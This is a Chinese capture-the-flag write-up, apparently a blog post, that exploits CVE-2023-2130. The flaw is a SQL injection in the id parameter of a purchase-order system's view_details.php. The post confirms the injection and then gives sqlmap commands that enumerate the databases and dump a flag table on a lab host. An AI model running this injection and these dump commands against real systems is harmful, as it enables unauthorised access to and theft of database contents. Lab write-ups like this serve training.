春秋云镜-CVE-2023-2130

1.题目

2.由题意可知“受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数”那我首先选择根据题意将接口复制进去我们发现页面

3.根据题意知道是id操作导致的sql注入漏洞我们先输入?id=1查看

测试是否存在sql问题我们在?id=1后面加入 and 1'=1'

确定存在漏洞

我们使用sqlmap进行注入测试

 python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch -dbs

使用代码进行数据库的注入

使用代码:python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch -D  purchase_order_db --tables找到flag的位置

查看fllllaaaag表代码: python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --batch -D  purchase_order_db -T fllllaaaag -dump

成功找到flag

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值